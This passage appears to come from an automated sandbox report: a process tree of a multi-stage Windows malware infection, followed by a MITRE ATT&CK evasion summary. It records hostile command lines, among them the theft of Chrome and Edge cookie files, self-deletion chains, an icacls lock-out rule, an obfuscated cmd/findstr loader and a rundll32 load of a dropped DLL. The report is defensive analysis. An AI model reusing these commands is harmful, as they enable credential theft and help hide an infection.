              cmd: "C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp
                C:\Windows\SysWOW64\cmd.exe [PID 6088]
                  cmd: cmd
                    C:\Windows\SysWOW64\findstr.exe [PID 2512]
                      cmd: findstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp
                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com [PID 5464]
                      cmd: Acre.exe.com k
                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com [PID 492]
                          cmd: C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                    C:\Windows\SysWOW64\PING.EXE [PID 5964]
                      cmd: ping 127.0.0.1 -n 30
                      - Executes dropped EXE
                      - Runs ping.exe
        C:\Users\Admin\Documents\6mq72uEDlO8PvAyx8SsxRD7D.exe [PID 5700]
          cmd: "C:\Users\Admin\Documents\6mq72uEDlO8PvAyx8SsxRD7D.exe"
          - Executes dropped EXE
            C:\Users\Admin\AppData\Roaming\6591511.exe [PID 1780]
              cmd: "C:\Users\Admin\AppData\Roaming\6591511.exe"
            C:\Users\Admin\AppData\Roaming\3163208.exe [PID 5652]
              cmd: "C:\Users\Admin\AppData\Roaming\3163208.exe"
        C:\Users\Admin\Documents\TZWAYtMVnr7WtnJ3GhcUDLxp.exe [PID 5784]
          cmd: "C:\Users\Admin\Documents\TZWAYtMVnr7WtnJ3GhcUDLxp.exe"
          - Executes dropped EXE
            C:\Users\Admin\Documents\TZWAYtMVnr7WtnJ3GhcUDLxp.exe [PID 3180]
              cmd: "C:\Users\Admin\Documents\TZWAYtMVnr7WtnJ3GhcUDLxp.exe"
        C:\Users\Admin\Documents\UrN6lb3a_OKPUuxjic9qNDU6.exe [PID 5804]
          cmd: "C:\Users\Admin\Documents\UrN6lb3a_OKPUuxjic9qNDU6.exe"
          - Executes dropped EXE
          - Suspicious use of SetWindowsHookEx
            C:\Windows\SysWOW64\cmd.exe [PID 6476]
              cmd: "C:\Windows\System32\cmd.exe" /c taskkill /im UrN6lb3a_OKPUuxjic9qNDU6.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\UrN6lb3a_OKPUuxjic9qNDU6.exe" & del C:\ProgramData\*.dll & exit
                C:\Windows\SysWOW64\taskkill.exe [PID 7048]
                  cmd: taskkill /im UrN6lb3a_OKPUuxjic9qNDU6.exe /f
                  - Kills process with taskkill
                C:\Windows\SysWOW64\timeout.exe [PID 6468]
                  cmd: timeout /t 6
                  - Delays execution with timeout.exe
        C:\Users\Admin\Documents\XO8LPI42kK5rFGIX30qEmIJm.exe [PID 5828]
          cmd: "C:\Users\Admin\Documents\XO8LPI42kK5rFGIX30qEmIJm.exe"
          - Executes dropped EXE
            C:\Windows\SysWOW64\WerFault.exe [PID 6004]
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 660
              - Program crash
            C:\Windows\SysWOW64\WerFault.exe [PID 5040]
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 672
              - Program crash
            C:\Windows\SysWOW64\WerFault.exe [PID 1780]
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 780
              - Program crash
            C:\Windows\SysWOW64\WerFault.exe [PID 4492]
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 816
              - Program crash
            C:\Windows\SysWOW64\WerFault.exe [PID 5156]
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1092
              - Program crash
        C:\Users\Admin\Documents\rteEoHmAeIECR3WOOBfQi8TF.exe [PID 5872]
          cmd: "C:\Users\Admin\Documents\rteEoHmAeIECR3WOOBfQi8TF.exe"
          - Executes dropped EXE
          - Checks BIOS information in registry
          - Checks whether UAC is enabled
          - Suspicious use of NtSetInformationThreadHideFromDebugger
        C:\Users\Admin\Documents\vcwFgU6ktFApk5A8Q2tvcvlA.exe [PID 5900]
          cmd: "C:\Users\Admin\Documents\vcwFgU6ktFApk5A8Q2tvcvlA.exe"
          - Executes dropped EXE
          - Suspicious use of SetWindowsHookEx
        C:\Users\Admin\Documents\iUB0iMTdmBK7rpqlqFt8J43Z.exe [PID 5964]
          cmd: "C:\Users\Admin\Documents\iUB0iMTdmBK7rpqlqFt8J43Z.exe"
            C:\Users\Admin\Documents\iUB0iMTdmBK7rpqlqFt8J43Z.exe [PID 972]
              cmd: C:\Users\Admin\Documents\iUB0iMTdmBK7rpqlqFt8J43Z.exe
            C:\Users\Admin\Documents\iUB0iMTdmBK7rpqlqFt8J43Z.exe [PID 4904]
              cmd: C:\Users\Admin\Documents\iUB0iMTdmBK7rpqlqFt8J43Z.exe
        C:\Users\Admin\Documents\wc5C0EUt5fcejaA3jOnxOeYi.exe [PID 6108]
          cmd: "C:\Users\Admin\Documents\wc5C0EUt5fcejaA3jOnxOeYi.exe"
          - Executes dropped EXE
          - Suspicious use of SetWindowsHookEx
            C:\Users\Admin\Documents\wc5C0EUt5fcejaA3jOnxOeYi.exe [PID 3164]
              cmd: "C:\Users\Admin\Documents\wc5C0EUt5fcejaA3jOnxOeYi.exe" -a
        C:\Users\Admin\Documents\NkQMFCgtR5NPdWS_ZbJfCPpp.exe [PID 6136]
          cmd: "C:\Users\Admin\Documents\NkQMFCgtR5NPdWS_ZbJfCPpp.exe"
          - Executes dropped EXE
          - Suspicious use of SetWindowsHookEx
            C:\Users\Admin\AppData\Local\Temp\setup_installer.exe [PID 6004]
              cmd: "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                C:\Users\Admin\AppData\Local\Temp\7zS477F02B5\setup_install.exe [PID 5388]
                  cmd: "C:\Users\Admin\AppData\Local\Temp\7zS477F02B5\setup_install.exe"
                    C:\Windows\SysWOW64\cmd.exe [PID 5524]
                      cmd: C:\Windows\system32\cmd.exe /c karotima_1.exe
                        C:\Users\Admin\AppData\Local\Temp\7zS477F02B5\karotima_1.exe [PID 4116]
                          cmd: karotima_1.exe
                            C:\Users\Admin\Documents\8GKtF0IDCZROmN_81D65Ac3t.exe [PID 7084]
                              cmd: "C:\Users\Admin\Documents\8GKtF0IDCZROmN_81D65Ac3t.exe"
                            C:\Users\Admin\Documents\I92bEWzlEkUL7PR0zwDx3oFn.exe [PID 6284]
                              cmd: "C:\Users\Admin\Documents\I92bEWzlEkUL7PR0zwDx3oFn.exe"
                                C:\Users\Admin\AppData\Local\Temp\11111.exe [PID 7392]
                                  cmd: C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                C:\Users\Admin\AppData\Local\Temp\11111.exe [PID 7820]
                                  cmd: C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                C:\Users\Admin\AppData\Local\Temp\22222.exe [PID 8100]
                                  cmd: C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                            C:\Users\Admin\Documents\pHYiVdWffBjmvoyLu_hXPQdK.exe [PID 6384]
                              cmd: "C:\Users\Admin\Documents\pHYiVdWffBjmvoyLu_hXPQdK.exe"
                                C:\Users\Admin\AppData\Local\Temp\setup_installer.exe [PID 6524]
                                  cmd: "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                    C:\Users\Admin\AppData\Local\Temp\7zSC7942356\setup_install.exe [PID 6708]
                                      cmd: "C:\Users\Admin\AppData\Local\Temp\7zSC7942356\setup_install.exe"
                                        C:\Windows\SysWOW64\cmd.exe [PID 6432]
                                          cmd: C:\Windows\system32\cmd.exe /c karotima_1.exe
                                            C:\Users\Admin\AppData\Local\Temp\7zSC7942356\karotima_1.exe [PID 7096]
                                              cmd: karotima_1.exe
                                                C:\Users\Admin\Documents\n_D4FR_jvHbfQHpY9gftDqDI.exe [PID 7308]
                                                  cmd: "C:\Users\Admin\Documents\n_D4FR_jvHbfQHpY9gftDqDI.exe"
                                                    C:\Users\Admin\Documents\n_D4FR_jvHbfQHpY9gftDqDI.exe [PID 7752]
                                                      cmd: C:\Users\Admin\Documents\n_D4FR_jvHbfQHpY9gftDqDI.exe
                                                        C:\Windows\SysWOW64\WerFault.exe [PID 6996]
                                                          cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 7752 -s 24
                                                          - Program crash
                                                C:\Users\Admin\Documents\2ZvNUN_O2F7YJ7kDR1eZVEzZ.exe [PID 7300]
                                                  cmd: "C:\Users\Admin\Documents\2ZvNUN_O2F7YJ7kDR1eZVEzZ.exe"
                                                    C:\Users\Admin\Documents\2ZvNUN_O2F7YJ7kDR1eZVEzZ.exe [PID 7688]
                                                      cmd: C:\Users\Admin\Documents\2ZvNUN_O2F7YJ7kDR1eZVEzZ.exe
                                                    C:\Users\Admin\Documents\2ZvNUN_O2F7YJ7kDR1eZVEzZ.exe [PID 6460]
                                                      cmd: C:\Users\Admin\Documents\2ZvNUN_O2F7YJ7kDR1eZVEzZ.exe
                                                C:\Users\Admin\Documents\2Xdo_dS_MrBuN5kDAwQtGkkp.exe [PID 7388]
                                                  cmd: "C:\Users\Admin\Documents\2Xdo_dS_MrBuN5kDAwQtGkkp.exe"
                                                C:\Users\Admin\Documents\Jlsi5TCWKei2zzWobjWuNBeC.exe [PID 5788]
                                                  cmd: "C:\Users\Admin\Documents\Jlsi5TCWKei2zzWobjWuNBeC.exe"
                                                C:\Users\Admin\Documents\w38a3Rtetdf01FT0Ku4Bz5rN.exe [PID 1164]
                                                  cmd: "C:\Users\Admin\Documents\w38a3Rtetdf01FT0Ku4Bz5rN.exe"
                                                C:\Users\Admin\Documents\0UKCwLOyS3K9o_aEDhHmhkY8.exe [PID 7792]
                                                  cmd: "C:\Users\Admin\Documents\0UKCwLOyS3K9o_aEDhHmhkY8.exe"
                                                C:\Users\Admin\Documents\9Kg8Psa1EsXtdkXJSCPDPE3v.exe [PID 7812]
                                                  cmd: "C:\Users\Admin\Documents\9Kg8Psa1EsXtdkXJSCPDPE3v.exe"
                                                C:\Users\Admin\Documents\GmtVQj9llyQkfzzpPYjF5Qcc.exe [PID 1652]
                                                  cmd: "C:\Users\Admin\Documents\GmtVQj9llyQkfzzpPYjF5Qcc.exe"
                                                    C:\Users\Admin\Documents\GmtVQj9llyQkfzzpPYjF5Qcc.exe [PID 7624]
                                                      cmd: C:\Users\Admin\Documents\GmtVQj9llyQkfzzpPYjF5Qcc.exe
                                                C:\Users\Admin\Documents\gEIrNmpvyfekMSYe8xlKCZ6I.exe [PID 4860]
                                                  cmd: "C:\Users\Admin\Documents\gEIrNmpvyfekMSYe8xlKCZ6I.exe"
                                                C:\Users\Admin\Documents\3PFKKLYITVndPyyDtRoMx_kp.exe [PID 4592]
                                                  cmd: "C:\Users\Admin\Documents\3PFKKLYITVndPyyDtRoMx_kp.exe"
                                                C:\Users\Admin\Documents\7ChTdDHphKgNG3p62kcMkRAo.exe [PID 7784]
                                                  cmd: "C:\Users\Admin\Documents\7ChTdDHphKgNG3p62kcMkRAo.exe"
                                                C:\Users\Admin\Documents\cGEOjDItnwOxoOA6GArDw2B0.exe [PID 7276]
                                                  cmd: "C:\Users\Admin\Documents\cGEOjDItnwOxoOA6GArDw2B0.exe"
                                        C:\Windows\SysWOW64\cmd.exe [PID 6504]
                                          cmd: C:\Windows\system32\cmd.exe /c karotima_2.exe
                                            C:\Users\Admin\AppData\Local\Temp\7zSC7942356\karotima_2.exe [PID 6668]
                                              cmd: karotima_2.exe
                                                C:\Users\Admin\AppData\Local\Temp\7zSC7942356\karotima_2.exe [PID 6448]
                                                  cmd: "C:\Users\Admin\AppData\Local\Temp\7zSC7942356\karotima_2.exe" -a
                            C:\Users\Admin\Documents\QUZuoJvPQpfTPtsgdRXGL_o9.exe [PID 6672]
                              cmd: "C:\Users\Admin\Documents\QUZuoJvPQpfTPtsgdRXGL_o9.exe"
                                C:\Users\Admin\Documents\QUZuoJvPQpfTPtsgdRXGL_o9.exe [PID 6260]
                                  cmd: C:\Users\Admin\Documents\QUZuoJvPQpfTPtsgdRXGL_o9.exe
                                C:\Users\Admin\Documents\QUZuoJvPQpfTPtsgdRXGL_o9.exe [PID 6640]
                                  cmd: C:\Users\Admin\Documents\QUZuoJvPQpfTPtsgdRXGL_o9.exe
                                C:\Users\Admin\Documents\QUZuoJvPQpfTPtsgdRXGL_o9.exe [PID 6280]
                                  cmd: C:\Users\Admin\Documents\QUZuoJvPQpfTPtsgdRXGL_o9.exe
                            C:\Users\Admin\Documents\FUDoDKJXHaQ5ATI5bxFak5Pc.exe [PID 6700]
                              cmd: "C:\Users\Admin\Documents\FUDoDKJXHaQ5ATI5bxFak5Pc.exe"
                                C:\Users\Admin\Documents\FUDoDKJXHaQ5ATI5bxFak5Pc.exe [PID 7528]
                                  cmd: C:\Users\Admin\Documents\FUDoDKJXHaQ5ATI5bxFak5Pc.exe
                            C:\Users\Admin\Documents\GyOkYEGoLEeFaOco1WvIRGKr.exe [PID 6900]
                              cmd: "C:\Users\Admin\Documents\GyOkYEGoLEeFaOco1WvIRGKr.exe"
                                C:\Users\Admin\Documents\GyOkYEGoLEeFaOco1WvIRGKr.exe [PID 5632]
                                  cmd: C:\Users\Admin\Documents\GyOkYEGoLEeFaOco1WvIRGKr.exe
                                C:\Users\Admin\Documents\GyOkYEGoLEeFaOco1WvIRGKr.exe [PID 5588]
                                  cmd: C:\Users\Admin\Documents\GyOkYEGoLEeFaOco1WvIRGKr.exe
                            C:\Users\Admin\Documents\8gyH0A2qynIGpf5tfIZSqFAb.exe [PID 6940]
                              cmd: "C:\Users\Admin\Documents\8gyH0A2qynIGpf5tfIZSqFAb.exe"
                                C:\Users\Admin\Documents\8gyH0A2qynIGpf5tfIZSqFAb.exe [PID 5200]
                                  cmd: C:\Users\Admin\Documents\8gyH0A2qynIGpf5tfIZSqFAb.exe
                            C:\Users\Admin\Documents\p4woxWOt5KOlFg8eEc2oV1BL.exe [PID 6228]
                              cmd: "C:\Users\Admin\Documents\p4woxWOt5KOlFg8eEc2oV1BL.exe"
                                C:\Windows\SysWOW64\cmd.exe [PID 5360]
                                  cmd: "C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp
                                    C:\Windows\SysWOW64\cmd.exe [PID 6856]
                                      cmd: cmd
                                        C:\Windows\SysWOW64\findstr.exe [PID 7028]
                                          cmd: findstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp
                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com [PID 5880]
                                          cmd: Acre.exe.com k
                                        C:\Windows\SysWOW64\PING.EXE [PID 6408]
                                          cmd: ping 127.0.0.1 -n 30
                                          - Runs ping.exe
                            C:\Users\Admin\Documents\aw3ZgOXlsedA0VuSKsAhhs41.exe [PID 5968]
                              cmd: "C:\Users\Admin\Documents\aw3ZgOXlsedA0VuSKsAhhs41.exe"
                            C:\Users\Admin\Documents\pDCEXYKVjtI3g8RX198dW2Dl.exe [PID 6828]
                              cmd: "C:\Users\Admin\Documents\pDCEXYKVjtI3g8RX198dW2Dl.exe"
                                C:\Users\Admin\AppData\Roaming\3542680.exe [PID 2728]
                                  cmd: "C:\Users\Admin\AppData\Roaming\3542680.exe"
                            C:\Users\Admin\Documents\WJFSWHfcMSth1mIuNTrj4aP8.exe [PID 5852]
                              cmd: "C:\Users\Admin\Documents\WJFSWHfcMSth1mIuNTrj4aP8.exe"
                                C:\Users\Admin\Documents\WJFSWHfcMSth1mIuNTrj4aP8.exe [PID 7836]
                                  cmd: C:\Users\Admin\Documents\WJFSWHfcMSth1mIuNTrj4aP8.exe
                            C:\Users\Admin\Documents\LFfeUx0cRVv8fTEkaItLFGnL.exe [PID 4344]
                              cmd: "C:\Users\Admin\Documents\LFfeUx0cRVv8fTEkaItLFGnL.exe"
                                C:\Users\Admin\Documents\LFfeUx0cRVv8fTEkaItLFGnL.exe [PID 7888]
                                  cmd: "C:\Users\Admin\Documents\LFfeUx0cRVv8fTEkaItLFGnL.exe" -a
                            C:\Users\Admin\Documents\Tz4V5Kz5UmFWG_A8a0vI173w.exe [PID 5580]
                              cmd: "C:\Users\Admin\Documents\Tz4V5Kz5UmFWG_A8a0vI173w.exe"
                            C:\Users\Admin\Documents\gr5wtI5F6lx9Z1qc1An9Aa7d.exe [PID 5628]
                              cmd: "C:\Users\Admin\Documents\gr5wtI5F6lx9Z1qc1An9Aa7d.exe"
                                C:\Users\Admin\Documents\gr5wtI5F6lx9Z1qc1An9Aa7d.exe [PID 6792]
                                  cmd: C:\Users\Admin\Documents\gr5wtI5F6lx9Z1qc1An9Aa7d.exe
                                C:\Users\Admin\Documents\gr5wtI5F6lx9Z1qc1An9Aa7d.exe [PID 7424]
                                  cmd: C:\Users\Admin\Documents\gr5wtI5F6lx9Z1qc1An9Aa7d.exe
                            C:\Users\Admin\Documents\ZxayKoVx0rcuNHEAPdoSKYrE.exe [PID 6692]
                              cmd: "C:\Users\Admin\Documents\ZxayKoVx0rcuNHEAPdoSKYrE.exe"
                                C:\Users\Admin\Documents\ZxayKoVx0rcuNHEAPdoSKYrE.exe [PID 7652]
                                  cmd: "C:\Users\Admin\Documents\ZxayKoVx0rcuNHEAPdoSKYrE.exe"
                            C:\Users\Admin\Documents\1JXQAK8tHtRr0HFtdAPfLdh2.exe [PID 6892]
                              cmd: "C:\Users\Admin\Documents\1JXQAK8tHtRr0HFtdAPfLdh2.exe"
                            C:\Users\Admin\Documents\mAmdHU8qRrZJXBVBTDbTKFIZ.exe [PID 6060]
                              cmd: "C:\Users\Admin\Documents\mAmdHU8qRrZJXBVBTDbTKFIZ.exe"
                                C:\Windows\SysWOW64\WerFault.exe [PID 7916]
                                  cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 6060 -s 660
                                  - Program crash
                                C:\Windows\SysWOW64\WerFault.exe [PID 8092]
                                  cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 6060 -s 672
                                  - Program crash
                                C:\Windows\SysWOW64\WerFault.exe [PID 7668]
                                  cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 6060 -s 684
                                  - Program crash
                                C:\Windows\SysWOW64\WerFault.exe [PID 4520]
                                  cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 6060 -s 816
                                  - Program crash
                            C:\Users\Admin\Documents\Ly5hqz2kUfaqNRsJHA_yne0k.exe [PID 6488]
                              cmd: "C:\Users\Admin\Documents\Ly5hqz2kUfaqNRsJHA_yne0k.exe"
                            C:\Users\Admin\Documents\TOe42lSTeKDW3C3DCgq_IHGJ.exe [PID 7148]
                              cmd: "C:\Users\Admin\Documents\TOe42lSTeKDW3C3DCgq_IHGJ.exe"
                            C:\Users\Admin\Documents\PqYuGq2xovVH86VGijaXWGXx.exe [PID 7108]
                              cmd: "C:\Users\Admin\Documents\PqYuGq2xovVH86VGijaXWGXx.exe"
                    C:\Windows\SysWOW64\cmd.exe [PID 3968]
                      cmd: C:\Windows\system32\cmd.exe /c karotima_2.exe
                        C:\Users\Admin\AppData\Local\Temp\7zS477F02B5\karotima_2.exe [PID 5040]
                          cmd: karotima_2.exe
                            C:\Users\Admin\AppData\Local\Temp\7zS477F02B5\karotima_2.exe [PID 5724]
                              cmd: "C:\Users\Admin\AppData\Local\Temp\7zS477F02B5\karotima_2.exe" -a
        C:\Users\Admin\Documents\0evkxxGDpJ9t_tofxo4TSlGo.exe [PID 4928]
          cmd: "C:\Users\Admin\Documents\0evkxxGDpJ9t_tofxo4TSlGo.exe"
          - Executes dropped EXE
          - Checks BIOS information in registry
          - Checks whether UAC is enabled
          - Suspicious use of NtSetInformationThreadHideFromDebugger
        C:\Users\Admin\Documents\woxBH7Nr6giQWt9wnhy33pk6.exe [PID 1464]
          cmd: "C:\Users\Admin\Documents\woxBH7Nr6giQWt9wnhy33pk6.exe"
          - Executes dropped EXE
            C:\Users\Admin\Documents\woxBH7Nr6giQWt9wnhy33pk6.exe [PID 6132]
              cmd: "C:\Users\Admin\Documents\woxBH7Nr6giQWt9wnhy33pk6.exe"
            C:\Windows\SysWOW64\WerFault.exe [PID 2716]
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 1464 -s 744
              - Program crash
    C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe [PID 4152]
      cmd: "C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe"
      - Executes dropped EXE
      - Checks whether UAC is enabled
    C:\Users\Admin\AppData\Local\Temp\Install.exe [PID 4200]
      cmd: "C:\Users\Admin\AppData\Local\Temp\Install.exe"
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\cmd.exe [PID 4336]
          cmd: cmd.exe /c taskkill /f /im chrome.exe
          - Suspicious use of WriteProcessMemory
            C:\Windows\SysWOW64\taskkill.exe [PID 4240]
              cmd: taskkill /f /im chrome.exe
              - Kills process with taskkill
    C:\Users\Admin\AppData\Local\Temp\pub2.exe [PID 4304]
      cmd: "C:\Users\Admin\AppData\Local\Temp\pub2.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Checks SCSI registry key(s)
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
\??\c:\windows\system32\svchost.exe [PID 1104]
  cmd: c:\windows\system32\svchost.exe -k netsvcs -s BITS
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
    C:\Windows\system32\svchost.exe [PID 4668]
      cmd: C:\Windows\system32\svchost.exe -k SystemNetworkService
      - Drops file in System32 directory
      - Checks processor information in registry
      - Modifies data under HKEY_USERS
      - Modifies registry class
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe [PID 3112]
  cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
  - Drops file in Windows directory
  - Modifies Internet Explorer settings
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
C:\Windows\system32\browser_broker.exe [PID 3660]
  cmd: C:\Windows\system32\browser_broker.exe -Embedding
  - Modifies Internet Explorer settings
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe [PID 4456]
  cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Modifies registry class
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
C:\Windows\system32\rUNdlL32.eXe [PID 4496]
  cmd: rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\rundll32.exe [PID 4532]
      cmd: rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
      - Loads dropped DLL
      - Modifies registry class
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe [PID 4604]
  cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Modifies Internet Explorer settings
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe [PID 2816]
  cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Modifies registry class
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe [PID 3976]
  cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Modifies registry class
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe [PID 3200]
  cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Modifies registry class
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe [PID 1168]
  cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Modifies registry class
C:\Users\Admin\AppData\Local\Temp\5D73.exe [PID 5520]
  cmd: C:\Users\Admin\AppData\Local\Temp\5D73.exe
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
    C:\Users\Admin\AppData\Local\Temp\5D73.exe [PID 5548]
      cmd: C:\Users\Admin\AppData\Local\Temp\5D73.exe
      - Executes dropped EXE
        C:\Windows\SysWOW64\icacls.exe [PID 4624]
          cmd: icacls "C:\Users\Admin\AppData\Local\13d0ca97-b0f8-44de-a3f1-0945e1d34d2a" /deny *S-1-1-0:(OI)(CI)(DE,DC)
          - Modifies file permissions
        C:\Users\Admin\AppData\Local\Temp\5D73.exe [PID 7148]
          cmd: "C:\Users\Admin\AppData\Local\Temp\5D73.exe" --Admin IsNotAutoStart IsNotTask
            C:\Users\Admin\AppData\Local\Temp\5D73.exe [PID 6680]
              cmd: "C:\Users\Admin\AppData\Local\Temp\5D73.exe" --Admin IsNotAutoStart IsNotTask
C:\Windows\explorer.exe [PID 5432]
  cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
C:\Windows\system32\rUNdlL32.eXe [PID 5396]
  cmd: rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
  - Process spawned unexpected child process
    C:\Windows\SysWOW64\rundll32.exe [PID 2368]
      cmd: rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
C:\Users\Admin\AppData\Local\Temp\4EF.exe [PID 4616]
  cmd: C:\Users\Admin\AppData\Local\Temp\4EF.exe
    C:\ProgramData\XC9MIXMEM7VWJW6X.exe [PID 6784]
      cmd: "C:\ProgramData\XC9MIXMEM7VWJW6X.exe"
    C:\Windows\SysWOW64\cmd.exe [PID 7616]
      cmd: "C:\Windows\System32\cmd.exe" /c taskkill /im 4EF.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\4EF.exe" & del C:\ProgramData\*.dll & exit
        C:\Windows\SysWOW64\taskkill.exe [PID 8144]
          cmd: taskkill /im 4EF.exe /f
          - Kills process with taskkill
C:\Windows\system32\rUNdlL32.eXe [PID 4564]
  cmd: rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
  - Process spawned unexpected child process
    C:\Windows\SysWOW64\rundll32.exe [PID 5040]
      cmd: rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe [PID 4824]
  cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
\??\c:\windows\system32\svchost.exe [PID 6196]
  cmd: c:\windows\system32\svchost.exe -k netsvcs -s seclogon
C:\Windows\system32\rUNdlL32.eXe [PID 6648]
  cmd: rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
  - Process spawned unexpected child process
    C:\Windows\SysWOW64\rundll32.exe [PID 6452]
      cmd: rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
C:\Users\Admin\AppData\Local\Temp\5590.exe [PID 7080]
  cmd: C:\Users\Admin\AppData\Local\Temp\5590.exe
Network
MITRE ATT&CK Enterprise v6
Defense Evasion
- Disabling Security Tools (1)
- File and Directory Permissions Modification (1)
- Modify Registry (2)
- Virtualization/Sandbox Evasion (1)
- Web Service (1)